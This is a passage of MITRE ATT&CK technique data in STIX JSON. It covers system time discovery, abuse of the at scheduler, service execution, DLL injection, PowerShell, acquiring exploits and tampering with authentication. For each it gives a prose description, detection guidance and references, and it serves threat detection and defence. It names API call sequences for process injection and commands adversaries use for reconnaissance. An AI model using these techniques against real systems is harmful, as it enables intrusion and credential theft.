"http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-04-16T12:50:15.929Z", "name": "System Time Discovery", "description": "An adversary may gather the system time and/or time zone settings from a local or remote system. The system time is set and stored by services, such as the Windows Time Service on Windows or systemsetup on macOS.(Citation: MSDN System Time)(Citation: Technet Windows Time Service)(Citation: systemsetup mac time) These time settings may also be synchronized between systems and services in an enterprise network, typically accomplished with a network time server within a domain.(Citation: Mac Time Sync)(Citation: linux system time)\n\nSystem time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing net time \\\\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz.(Citation: Technet Windows Time Service) In addition, adversaries can discover device uptime through functions such as GetTickCount() to determine how long it has been since the system booted up.(Citation: Virtualization/Sandbox Evasion)\n\nOn network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show clock detail` can be used to see the current time configuration.(Citation: show_clock_detail_cisco_cmd)\n\nIn addition, system calls \u2013 such as time() \u2013 have been used to collect the current time on Linux devices.(Citation: MAGNET GOBLIN) On macOS systems, adversaries may use commands such as systemsetup -gettimezone or timeIntervalSinceNow to gather current time zone information or current date and time.(Citation: System Information Discovery Technique)(Citation: ESET DazzleSpy Jan 2022)\n\nThis information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)(Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["FIRST.ORG's Cyber Threat Intelligence SIG", "Austin Clark, @c2defense"], "x_mitre_deprecated": false, "x_mitre_detection": "Command-line interface monitoring may be useful to detect instances of net.exe or other command-line utilities being used to gather system time or time zone. Methods of detecting API use for gathering this information are likely less useful due to how often they may be used by legitimate software.\n\nFor network infrastructure devices, collect AAA logging to monitor `show` commands being run by non-standard users from non-standard locations.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Network", "Linux", "macOS"], "x_mitre_version": "1.4", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077", "created": "2017-05-31T21:31:37.450Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1124", "external_id": "T1124"}, {"source_name": "systemsetup mac time", "description": "Apple Support. (n.d.). About systemsetup in Remote Desktop. Retrieved March 27, 2024.", "url": "https://support.apple.com/en-gb/guide/remote-desktop/apd95406b8d/mac"}, {"source_name": "linux system time", "description": "ArchLinux. (2024, February 1). System Time. Retrieved March 27, 2024.", "url": "https://wiki.archlinux.org/title/System_time"}, {"source_name": "MAGNET GOBLIN", "description": "Check Point Research. (2024, March 8). MAGNET GOBLIN TARGETS PUBLICLY FACING SERVERS USING 1-DAY VULNERABILITIES. Retrieved March 27, 2024.", "url": "https://research.checkpoint.com/2024/magnet-goblin-targets-publicly-facing-servers-using-1-day-vulnerabilities/"}, {"source_name": "show_clock_detail_cisco_cmd", "description": "Cisco. (2023, March 6). show clock detail - Cisco IOS Security Command Reference: Commands S to Z . Retrieved July 13, 2022.", "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-s2.html#wp1896741674"}, {"source_name": "Mac Time Sync", "description": "Cone, Matt. (2021, January 14). Synchronize your Mac's Clock with a Time Server. Retrieved March 27, 2024.", "url": "https://www.macinstruct.com/tutorials/synchronize-your-macs-clock-with-a-time-server/"}, {"source_name": "ESET DazzleSpy Jan 2022", "description": "M.L\u00e9veill\u00e9, M., Cherepanov, A.. (2022, January 25). Watering hole deploys new macOS malware, DazzleSpy, in Asia. Retrieved May 6, 2022.", "url": "https://www.welivesecurity.com/2022/01/25/watering-hole-deploys-new-macos-malware-dazzlespy-asia/"}, {"source_name": "AnyRun TimeBomb", "description": "Malicious History. (2020, September 17). Time Bombs: Malware With Delayed Execution. Retrieved April 22, 2021.", "url": "https://any.run/cybersecurity-blog/time-bombs-malware-with-delayed-execution/"}, {"source_name": "Technet Windows Time Service", "description": "Mathers, B. (2016, September 30). Windows Time Service Tools and Settings. Retrieved November 25, 2016.", "url": "https://technet.microsoft.com/windows-server-docs/identity/ad-ds/get-started/windows-time-service/windows-time-service-tools-and-settings"}, {"source_name": "MSDN System Time", "description": "Microsoft. (n.d.). System Time. Retrieved November 25, 2016.", "url": "https://msdn.microsoft.com/ms724961.aspx"}, {"source_name": "RSA EU12 They're Inside", "description": "Rivner, U., Schwartz, E. (2012). They\u2019re Inside\u2026 Now What?. Retrieved November 25, 2016.", "url": "https://www.rsaconference.com/writable/presentations/file_upload/ht-209_rivner_schwartz.pdf"}, {"source_name": "System Information Discovery Technique", "description": "YUCEEL, Huseyin Can. Picus Labs. (2022, June 9). The System Information Discovery Technique Explained - MITRE ATT&CK T1082. Retrieved March 27, 2024.", "url": "https://www.picussecurity.com/resource/the-system-information-discovery-technique-explained-mitre-attack-t1082"}, {"source_name": "Virtualization/Sandbox Evasion", "description": "YUCEEL, Huseyin Can. Picus Labs. (2022, June 9). Virtualization/Sandbox Evasion - How Attackers Avoid Malware Analysis. Retrieved December 26, 2023.", "url": "https://www.picussecurity.com/resource/virtualization/sandbox-evasion-how-attackers-avoid-malware-analysis"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-11-15T14:38:10.876Z", "name": "At", "description": "Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.\n\nOn Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow file. If the at.allow file does not exist, the at.deny file is checked. Every username not listed in at.deny is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)\n\nAdversaries may use [at](https://attack.mitre.org/software/S0110) to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote [Execution](https://attack.mitre.org/tactics/TA0002) as part of [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or to run a process under the context of a specified account (such as SYSTEM).\n\nIn Linux environments, adversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via sudo.(Citation: GTFObins at)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\\System32\\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.\n\nConfigure event logging for scheduled task creation and changes by enabling the \"Microsoft-Windows-TaskScheduler/Operational\" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)\n\n* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered\n* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated\n* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted\n* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created\n* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled\n* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)\n\nRemote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.\n\nIn Linux and macOS environments, monitor scheduled task creation using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nReview all jobs using the atq command and ensure IP addresses stored in the SSH_CONNECTION and SSH_CLIENT variables, machines that created the jobs, are trusted hosts. All [at](https://attack.mitre.org/software/S0110) jobs are stored in /var/spool/cron/atjobs/.(Citation: rowland linux at 2019)\n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for [Command and Control](https://attack.mitre.org/tactics/TA0011), learning details about the environment through [Discovery](https://attack.mitre.org/tactics/TA0007), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Linux", "macOS"], "x_mitre_version": "2.2", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator", "User"], "x_mitre_remote_support": true, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--f3d95a1f-bba2-44ce-9af7-37866cd63fd0", "created": "2019-11-27T13:52:45.853Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1053/002", "external_id": "T1053.002"}, {"source_name": "rowland linux at 2019", "description": "Craig Rowland. (2019, July 25). Getting an Attacker IP Address from a Malicious Linux At Job. Retrieved October 15, 2021.", "url": "https://www.linkedin.com/pulse/getting-attacker-ip-address-from-malicious-linux-job-craig-rowland/"}, {"source_name": "GTFObins at", "description": "Emilio Pinna, Andrea Cardaci. (n.d.). gtfobins at. Retrieved September 28, 2021.", "url": "https://gtfobins.github.io/gtfobins/at/"}, {"source_name": "Linux at", "description": "IEEE/The Open Group. (2017). at(1p) \u2014 Linux manual page. Retrieved February 25, 2022.", "url": "https://man7.org/linux/man-pages/man1/at.1p.html"}, {"source_name": "Twitter Leoloobeek Scheduled Task", "description": "Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved December 12, 2017.", "url": "https://twitter.com/leoloobeek/status/939248813465853953"}, {"source_name": "Microsoft Scheduled Task Events Win10", "description": "Microsoft. (2017, May 28). Audit Other Object Access Events. Retrieved June 27, 2019.", "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events"}, {"source_name": "TechNet Scheduled Task Events", "description": "Microsoft. (n.d.). General Task Registration. Retrieved December 12, 2017.", "url": "https://technet.microsoft.com/library/dd315590.aspx"}, {"source_name": "TechNet Autoruns", "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902"}, {"source_name": "TechNet Forum Scheduled Task Operational Setting", "description": "Satyajit321. (2015, November 3). Scheduled Tasks History Retention settings. Retrieved December 12, 2017.", "url": "https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Service Execution", "description": "Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with [New Service](https://attack.mitre.org/techniques/T1050) and [Modify Existing Service](https://attack.mitre.org/techniques/T1031) during service persistence or privilege escalation.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Changes to service Registry entries and command-line invocation of tools capable of modifying services that do not correlate with known software, patch cycles, etc., may be suspicious. If a service is used only to execute a binary or script and not to persist, then it will likely be changed back to its original form shortly after the service is restarted so the service is not left broken, as is the case with the common administrator tool [PsExec](https://attack.mitre.org/software/S0029).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["Administrator", "SYSTEM"], "x_mitre_remote_support": true, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--f44731de-ea9f-406d-9b83-30ecbb9b4392", "created": "2017-05-31T21:30:36.550Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1035", "external_id": "T1035"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2023-08-11T21:34:38.558Z", "name": "Dynamic-link Library Injection", "description": "Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process. \n\nDLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread (which calls the LoadLibrary API responsible for loading the DLL). (Citation: Elastic Process Injection July 2017) \n\nVariations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of LoadLibrary).(Citation: Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July 2017) \n\nAnother variation of this method, often referred to as Module Stomping/Overloading or DLL Hollowing, may be leveraged to conceal injected code within a process. This method involves loading a legitimate DLL into a remote process then manually overwriting the module's AddressOfEntryPoint before starting a new thread in the target process.(Citation: Module Stomping for Shellcode Injection) This variation allows attackers to hide malicious injected code by potentially backing its execution with a legitimate DLL file on disk.(Citation: Hiding Malicious Code with Module Stomping) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Boominathan Sundaram"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nMonitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Application control", "Anti-virus"], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945", "created": "2020-01-14T01:26:08.145Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1055/001", "external_id": "T1055.001"}, {"source_name": "Hiding Malicious Code with Module Stomping", "description": "Aliz Hammond. (2019, August 15). Hiding Malicious Code with \"Module Stomping\": Part 1. Retrieved July 14, 2022.", "url": "https://blog.f-secure.com/hiding-malicious-code-with-module-stomping/"}, {"source_name": "Elastic HuntingNMemory June 2017", "description": "Desimone, J. (2017, June 13). Hunting in Memory. Retrieved December 7, 2017.", "url": "https://www.endgame.com/blog/technical-blog/hunting-memory"}, {"source_name": "Elastic Process Injection July 2017", "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"}, {"source_name": "Module Stomping for Shellcode Injection", "description": "Red Teaming Experiments. (n.d.). Module Stomping for Shellcode Injection. Retrieved July 14, 2022.", "url": "https://www.ired.team/offensive-security/code-injection-process-injection/modulestomping-dll-hollowing-shellcode-injection"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "PowerShell", "description": "PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. \n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nAdministrator permissions are required to use PowerShell to connect to remote systems.\n\nA number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack)\n\nPowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) (Citation: Microsoft PSfromCsharp APR 2014)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Praetorian"], "x_mitre_detection": "If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.\n\nMonitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)\n\nIt is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features. (Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.1", "x_mitre_permissions_required": ["User", "Administrator"], "x_mitre_remote_support": true, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--f4882e23-8aa7-4b12-b28a-b349c12ee9e0", "created": "2017-05-31T21:31:06.512Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1086", "external_id": "T1086"}, {"source_name": "TechNet PowerShell", "description": "Microsoft. (n.d.). Windows PowerShell Scripting. Retrieved April 28, 2016.", "url": "https://technet.microsoft.com/en-us/scriptcenter/dd742419.aspx"}, {"source_name": "Powersploit", "description": "PowerSploit. (n.d.). Retrieved December 4, 2014.", "url": "https://github.com/mattifestation/PowerSploit"}, {"source_name": "Github PSAttack", "description": "Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.", "url": "https://github.com/jaredhaight/PSAttack"}, {"source_name": "Sixdub PowerPick Jan 2016", "description": "Warner, J.. (2015, January 6). Inexorable PowerShell \u2013 A Red Teamer\u2019s Tale of Overcoming Simple AppLocker Policies. Retrieved December 8, 2018.", "url": "http://www.sixdub.net/?p=367"}, {"source_name": "SilentBreak Offensive PS Dec 2015", "description": "Christensen, L.. (2015, December 28). The Evolution of Offensive PowerShell Invocation. Retrieved December 8, 2018.", "url": "https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/"}, {"source_name": "Microsoft PSfromCsharp APR 2014", "description": "Babinec, K. (2014, April 28). Executing PowerShell scripts from C#. Retrieved April 22, 2019.", "url": "https://blogs.msdn.microsoft.com/kebab/2014/04/28/executing-powershell-scripts-from-c/"}, {"source_name": "Malware Archaeology PowerShell Cheat Sheet", "description": "Malware Archaeology. (2016, June). WINDOWS POWERSHELL LOGGING CHEAT SHEET - Win 7/Win 2008 or later. Retrieved June 24, 2016.", "url": "http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf"}, {"source_name": "FireEye PowerShell Logging 2016", "description": "Dunwoody, M. (2016, February 11). GREATER VISIBILITY THROUGH POWERSHELL LOGGING. Retrieved February 16, 2016.", "url": "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Exploits", "description": "Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)\n\nIn addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals.(Citation: PegasusCitizenLab)(Citation: Wired SandCat Oct 2019) In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).(Citation: TempertonDarkHotel)\n\nAn adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. There is usually a delay between when an exploit is discovered and when it is made public. An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent operation.\n\nAdversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--f4b843c1-7e92-4701-8fed-ce82f8be2636", "created": "2020-10-01T02:17:46.086Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1588/005", "external_id": "T1588.005"}, {"source_name": "Exploit Database", "description": "Offensive Security. (n.d.). Exploit Database. Retrieved October 15, 2020.", "url": "https://www.exploit-db.com/"}, {"source_name": "TempertonDarkHotel", "description": "Temperton, J. (2015, August 10). Hacking Team zero-day used in new Darkhotel attacks. Retrieved March 9, 2017.", "url": "https://www.wired.co.uk/article/darkhotel-hacking-team-cyber-espionage"}, {"source_name": "NationsBuying", "description": "Nicole Perlroth and David E. Sanger. (2013, July 12). Nations Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.", "url": "https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html"}, {"source_name": "PegasusCitizenLab", "description": "Bill Marczak and John Scott-Railton. (2016, August 24). The Million Dollar Dissident: NSO Group\u2019s iPhone Zero-Days used against a UAE Human Rights Defender. Retrieved December 12, 2016.", "url": "https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/"}, {"source_name": "Wired SandCat Oct 2019", "description": "Zetter, K. (2019, October 3). Researchers Say They Uncovered Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved October 15, 2020.", "url": "https://www.vice.com/en/article/3kx5y3/uzbekistan-hacking-operations-uncovered-due-to-spectacularly-bad-opsec"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2024-04-11T21:51:44.851Z", "name": "Modify Authentication Process", "description": "Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).\n\nAdversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}, {"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Chris Ross @xorrior"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification Packages) and correlate then investigate the DLL files these files reference. \n\nPassword filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)\n\nMonitor for calls to OpenProcess that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton) \n\nMonitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.\n\nMonitor for suspicious additions to the /Library/Security/SecurityAgentPlugins directory.(Citation: Xorrior Authorization Plugins)\n\nConfigure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not 